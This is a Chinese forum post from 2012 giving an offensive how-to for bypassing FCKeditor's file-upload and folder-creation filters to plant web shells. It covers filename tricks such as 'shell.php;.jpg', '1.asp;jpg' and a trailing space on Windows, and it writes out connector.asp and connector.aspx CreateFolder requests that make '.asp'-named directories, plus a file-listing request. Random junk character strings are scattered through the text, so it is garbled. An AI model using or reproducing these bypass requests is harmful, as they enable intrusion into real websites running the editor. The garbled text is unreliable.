很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg% r3 |7 l. G4 e+ [3 A
% z2 _ R' f# X1 I0 o2 v2 R! G5 I
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。5 k, L: ^& h \# Q- H
9 A" W! E! ]4 p继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。% B! v0 i6 L+ @; m
; z$ I/ j8 w$ p2 D5 g
突破建立文件夹:
% O5 s' p- V' v$ f N& g. X/ S: p7 V) ?6 |4 E; B5 W
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
" S! Y8 M, _2 M! @3 R% l- \ E) x7 Y1 @2 Z, [* j
参数:% t( |4 r& n; d$ B: X
9 P+ P) |7 y& h1 E当前目录名:CurrentFolder=/qing.asp
' z$ e6 A7 a; v |: c
- K7 h, M5 U8 J. z0 J. E& {新的目录名:NewFolderName=x.asp
" s, a( Q: P' K* A" `' C$ F9 a& e& g1 @
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……0 J: O0 x b! d4 O
) z, [7 Y7 M4 T" ^! u! H& e
那么 x.asp 就已经建立生成了,此方法百试百灵!
0 k: u! c% n5 Y7 ?3 W8 Y8 p
D- y1 a$ ~( {新建文件夹参数 x.asp,基本都能搞定。
+ z$ N( {0 U; E) [& E V I, z# f
3 \, W# q3 [3 R* P) @9 l w" E下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
3 D# T$ Y+ _* m) Y" z$ J: Y7 |
' Z) J! q) M, P1 o9 G; F) S* }aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
8 A; ~5 n7 M: ]+ {
2 ]+ M2 o* W/ r获取文件列表
" M- h) M& }& D+ ] aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F" E$ [, e$ D4 h- l
$ y9 p" c8 P2 ~$ i! E- l
|
发表于 2012-12-31 09:27:09
收藏
支持
反对